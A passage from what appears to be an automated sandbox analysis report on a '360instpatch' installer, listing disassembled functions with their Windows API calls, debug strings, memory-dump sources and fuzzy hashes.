                                                                                                                                                                                                              • MoveWindow.USER32(?,?,00000104,000000AF,00000050,00000001,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000), ref: 00B64AE4
                                                                                                                                                                                                              • MoveWindow.USER32(?,?,000000CE,000000AF,00000050,00000001,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000), ref: 00B64B04
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B17
                                                                                                                                                                                                              • DestroyWindow.USER32(?,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B2E
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B3B
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000001,?,00000000,?,00B48E02,00000000,?,?,360Installer,00000000,?,.dir,?), ref: 00B64B47
                                                                                                                                                                                                                • Part of subcall function 00B558F3: __EH_prolog3.LIBCMT ref: 00B558FA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Show$Move$ClientDestroyH_prolog3Rect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1342398966-0
                                                                                                                                                                                                              • Opcode ID: 0eb58cb2262df3ee31ab368f7b98e398b6da074eaeb7fe4cc93906a1a4f94edd
                                                                                                                                                                                                              • Instruction ID: ea919e19fd065919afddd088ee9186fa4a62badcea2d51068aa07a791363a906
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0eb58cb2262df3ee31ab368f7b98e398b6da074eaeb7fe4cc93906a1a4f94edd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2219076600615ABDB106FB8DC85FEF7BBABF48305F040968B666D2191DBB5A9008B50
                                                                                                                                                                                                              Function 00B9EA8C Relevance: 10.6, APIs: 7, Instructions: 71threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00B9EABD
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 00B9EAC9
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 00B9EAD6
                                                                                                                                                                                                              • __initptd.LIBCMT ref: 00B9EADF
                                                                                                                                                                                                              • CreateThread.KERNEL32(?,?,00B9EA09,00000000,?,?), ref: 00B9EB0D
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 00B9EB17
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 00B9EB2F
                                                                                                                                                                                                                • Part of subcall function 00B998D1: __getptd_noexit.LIBCMT ref: 00B998D1
                                                                                                                                                                                                                • Part of subcall function 00B9A5B1: __decode_pointer.LIBCMT ref: 00B9A5BC
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit__initptd
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3358092440-0
                                                                                                                                                                                                              • Opcode ID: d45de10c527af35031536fdd6ea9900224be8c144d0d3a32cad6456e3555661d
                                                                                                                                                                                                              • Instruction ID: c9731c9f96a7b30c01178fa2160bc653da234b8661dc88e80aa081894435f727
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d45de10c527af35031536fdd6ea9900224be8c144d0d3a32cad6456e3555661d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7011EC32505209EFDF01EFA89C8689E7BE5FF55320B2000BDF125A30A1EB70E9018AA1
                                                                                                                                                                                                              Function 6CDDC60D Relevance: 10.6, APIs: 7, Instructions: 59memoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0000000D,?,6CD34437,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?), ref: 6CDDC58E
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?,00000001,?,?), ref: 6CDDC595
                                                                                                                                                                                                                • Part of subcall function 6CDDC4A6: IsProcessorFeaturePresent.KERNEL32(0000000C,6CDDC57C,?,6CD34437,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?), ref: 6CDDC4A8
                                                                                                                                                                                                              • RtlInterlockedPopEntrySList.NTDLL(01637D30), ref: 6CDDC5A2
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?), ref: 6CDDC5B7
                                                                                                                                                                                                              • RtlInterlockedPopEntrySList.NTDLL(00000000), ref: 6CDDC5D0
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6CD34D1D,00000000,00000000,?,?,6CDA4DB4,?,?,?,?,?,00000001), ref: 6CDDC5E4
                                                                                                                                                                                                              • RtlInterlockedPushEntrySList.NTDLL(00000000), ref: 6CDDC5FB
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: EntryInterlockedList$AllocHeapVirtual$FeatureFreePresentProcessProcessorPush
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2304957937-0
                                                                                                                                                                                                              • Opcode ID: dba07d1116cd93d6fba853acf6bcd436f43d8126583f44a5245e3d0300bea241
                                                                                                                                                                                                              • Instruction ID: 1901b78941cc0c85674f61f9c753f9ccbc701ec0d52496b0ecbf81e6c4428d1d
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dba07d1116cd93d6fba853acf6bcd436f43d8126583f44a5245e3d0300bea241
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A001F932B56210E7EF3167799C08F4A3B79ABC6B15F924024F410E75A0CF32E8008BA4
                                                                                                                                                                                                              Function 6CD51C33 Relevance: 9.1, APIs: 6, Instructions: 96threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 6CD51C52
                                                                                                                                                                                                              • GdiplusStartup.GDIPLUS(?,?,00000000,00000018), ref: 6CD51C74
                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CD51CBE
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000400,00000000), ref: 6CD51CCF
                                                                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 6CD51D0A
                                                                                                                                                                                                              • SetWindowsHookExW.USER32(00000003,6CD3D3E5,00000000,00000000), ref: 6CD51D19
                                                                                                                                                                                                                • Part of subcall function 6CD4537A: __EH_prolog3_catch.LIBCMT ref: 6CD45381
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4120199942.000000006CD21000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6CD20000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120169906.000000006CD20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120288463.000000006CE05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120321049.000000006CE29000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE2B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE30000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4B000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120346402.000000006CE4F000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120454362.000000006CE50000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120497160.000000006CE56000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6cd20000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Current$DirectoryGdiplusH_prolog3H_prolog3_catchHookStartupThreadWindows_memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3120476819-0
                                                                                                                                                                                                              • Opcode ID: f129faa49bb95a31256f8241988a55f8ebd7381f8e0b4e33a6829968df39c72b
                                                                                                                                                                                                              • Instruction ID: bf697ba72136b01a7bd6c2420ebde8ec836e133f0e86e1188202f8fceccd61d2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f129faa49bb95a31256f8241988a55f8ebd7381f8e0b4e33a6829968df39c72b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6C312CB1A002099FDF44DFA4C985AEDB7F8FF09308F90452EE545D7690DB35AA19CBA0
                                                                                                                                                                                                              Function 6BF3AC74 Relevance: 9.1, APIs: 6, Instructions: 71threadCOMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 6BF3ACA5
                                                                                                                                                                                                              • __calloc_crt.LIBCMT ref: 6BF3ACB1
                                                                                                                                                                                                              • __getptd.LIBCMT ref: 6BF3ACBE
                                                                                                                                                                                                              • CreateThread.KERNEL32(?,?,6BF3ABF1,00000000,?,?), ref: 6BF3ACF5
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 6BF3ACFF
                                                                                                                                                                                                              • __dosmaperr.LIBCMT ref: 6BF3AD17
                                                                                                                                                                                                                • Part of subcall function 6BF3DC8C: __getptd_noexit.LIBCMT ref: 6BF3DC8C
                                                                                                                                                                                                                • Part of subcall function 6BF38356: __decode_pointer.LIBCMT ref: 6BF38361
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1803633139-0
                                                                                                                                                                                                              • Opcode ID: 3fab13a0797fe12cc80585d2f2020f5dd915aa1bdd6a75a24fa024610ac5a3bc
                                                                                                                                                                                                              • Instruction ID: 3ef6e99f5c6800679647049c14a5901898593fdd221edca140aeaa2e2c7e850c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3fab13a0797fe12cc80585d2f2020f5dd915aa1bdd6a75a24fa024610ac5a3bc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2511CE7351422AAFDF00AFB9DD8289E7BF4EF44368B204469F510D2170EB79D9018BE1
                                                                                                                                                                                                              Function 6BF0B2A3 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 165COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 6BF0ADFF: __EH_prolog3_GS.LIBCMT ref: 6BF0AE06
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0B2F3
                                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 6BF0B328
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.] SetFileLen %I64d , xrefs: 6BF0B3DE
                                                                                                                                                                                                              • [%d.%3d] AllocRange fail , xrefs: 6BF0B455
                                                                                                                                                                                                              • [%d.%3d] AsyncStartHttp fail ErrorCode = %d(%s), xrefs: 6BF0B495
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CountTick$H_prolog3_
                                                                                                                                                                                                              • String ID: [%d.%3d] AllocRange fail $[%d.%3d] AsyncStartHttp fail ErrorCode = %d(%s)$[%d.] SetFileLen %I64d
                                                                                                                                                                                                              • API String ID: 543293942-671058960
                                                                                                                                                                                                              • Opcode ID: bc1ee1201cec20bc554a43914e5ec9e66f136f72cd1b0f882d8ea8dd98d1c775
                                                                                                                                                                                                              • Instruction ID: cb06f83cd56c321f096a39656d4fa282b4a052cff7c8699241f9325045f30a32
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bc1ee1201cec20bc554a43914e5ec9e66f136f72cd1b0f882d8ea8dd98d1c775
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7551D476900705DFCB11CFA4C950AAEF7FAFF84314F20499DE452A2232DB79AA41EB51
                                                                                                                                                                                                              Function 6BF0ADFF Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • [%d.]No CheckFileMsg FileSize:%I64d , xrefs: 6BF0AE69
                                                                                                                                                                                                              • [%d.] CheckFile Start , xrefs: 6BF0AEA6
                                                                                                                                                                                                              • [%d.] Rename start , xrefs: 6BF0AF2F
                                                                                                                                                                                                              • [%d.] CheckFile p2s Start , xrefs: 6BF0AEEA
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: H_prolog3_
                                                                                                                                                                                                              • String ID: [%d.] CheckFile Start $[%d.] CheckFile p2s Start $[%d.] Rename start $[%d.]No CheckFileMsg FileSize:%I64d
                                                                                                                                                                                                              • API String ID: 2427045233-3735358712
                                                                                                                                                                                                              • Opcode ID: a03d823757131728f84aec08414fbdac001eef440d4370987d5b61908922857e
                                                                                                                                                                                                              • Instruction ID: f61ad340289d2218da4d0e3fe3d9ae5b936c9646fa13b9e7ffed698965b3d320
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a03d823757131728f84aec08414fbdac001eef440d4370987d5b61908922857e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CF313B73A00E019FC7609FB988B1C5FB3E2AB95304B10856DD45A532B0EF3D9846E761
                                                                                                                                                                                                              Function 00B928D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 82fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00B22750: _vswprintf_s.LIBCMT ref: 00B22783
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000,?,?,00000104,00000000), ref: 00B9291E
                                                                                                                                                                                                              • DeviceIoControl.KERNEL32 ref: 00B9296D
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00B929BD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseControlCreateDeviceFileHandle_vswprintf_s
                                                                                                                                                                                                              • String ID: %02X%02X%02X%02X%02X%02X$\\.\%s
                                                                                                                                                                                                              • API String ID: 2864800763-1525991222
                                                                                                                                                                                                              • Opcode ID: 6155e06bc91ebb16d4f42dc629be8e51e0e8c9f8df210b1c98e6b2f4c8752ad0
                                                                                                                                                                                                              • Instruction ID: badd43a2d68bb1adb2b90a7279fb06b12022c075b3ed129aca8894df395fe0cf
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6155e06bc91ebb16d4f42dc629be8e51e0e8c9f8df210b1c98e6b2f4c8752ad0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3921E5B15083506FD724EB64DC85FFBB7ECEB8C704F40496DB6E883190D67899048762
                                                                                                                                                                                                              Function 00B4869E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • __EH_prolog3.LIBCMT ref: 00B486BD
                                                                                                                                                                                                              • _memset.LIBCMT ref: 00B486F8
                                                                                                                                                                                                              • GetClassNameW.USER32(?,00000000,00000104), ref: 00B4870B
                                                                                                                                                                                                                • Part of subcall function 00B27FA1: __wcsicoll.LIBCMT ref: 00B27FB9
                                                                                                                                                                                                              • IsDialogMessageW.USER32(?,?), ref: 00B48757
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4114619207.0000000000B11000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114543493.0000000000B10000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114822760.0000000000BCE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114884300.0000000000BF3000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114936766.0000000000BF6000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000C00000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4114994565.0000000000EED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_b10000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassDialogH_prolog3MessageName__wcsicoll_memset
                                                                                                                                                                                                              • String ID: EDIT
                                                                                                                                                                                                              • API String ID: 858151411-3080729518
                                                                                                                                                                                                              • Opcode ID: b926175a2dc70379aeaaa497ad1a72600a45f2d69f32960420a154c2524dba8e
                                                                                                                                                                                                              • Instruction ID: e419ad52d3056215509f7c92a8362e48ba3563dcb2539713207264a47652c3dc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b926175a2dc70379aeaaa497ad1a72600a45f2d69f32960420a154c2524dba8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F821D1759002189BDF24EF64DC55ABEB3E4EF14710F10496AE82AD7291DF30AE44DB10
                                                                                                                                                                                                              Function 6BEEC462 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53fileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateFileW.KERNEL32(?,00000000,00000000,00000000,00000003,00000080,00000000,?,?,6BEECDEF,?), ref: 6BEEC48D
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,6BEECDEF,?), ref: 6BEEC4A4
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,6BEECDEF,?), ref: 6BEEC499
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: _memset.LIBCMT ref: 6BF24091
                                                                                                                                                                                                                • Part of subcall function 6BF2405E: wvnsprintfW.SHLWAPI(?,000003FF,6BFCC288,6BF0E1F9), ref: 6BF240AC
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null, xrefs: 6BEEC471
                                                                                                                                                                                                              • IsFileExisting Error = %d, xrefs: 6BEEC4D5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000008.00000002.4119900398.000000006BEE1000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6BEE0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119875025.000000006BEE0000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119950476.000000006BF5F000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF7F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4119997029.000000006BF85000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120063873.000000006BF8A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120095888.000000006BFCC000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000008.00000002.4120132063.000000006BFCF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_6bee0000_360instpatch.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseCreateErrorFileHandleLast_memsetwvnsprintf
                                                                                                                                                                                                              • String ID: IsFileExisting Error = %d$exception raised in method CFileMgr::IsFileExisting, parameter pFileName can not be null
                                                                                                                                                                                                              • API String ID: 162527170-4251026172
                                                                                                                                                                                                              • Opcode ID: 29ae752743a7f347728abb65440336fbf29fcb16b52b5fa172672504de6e4767
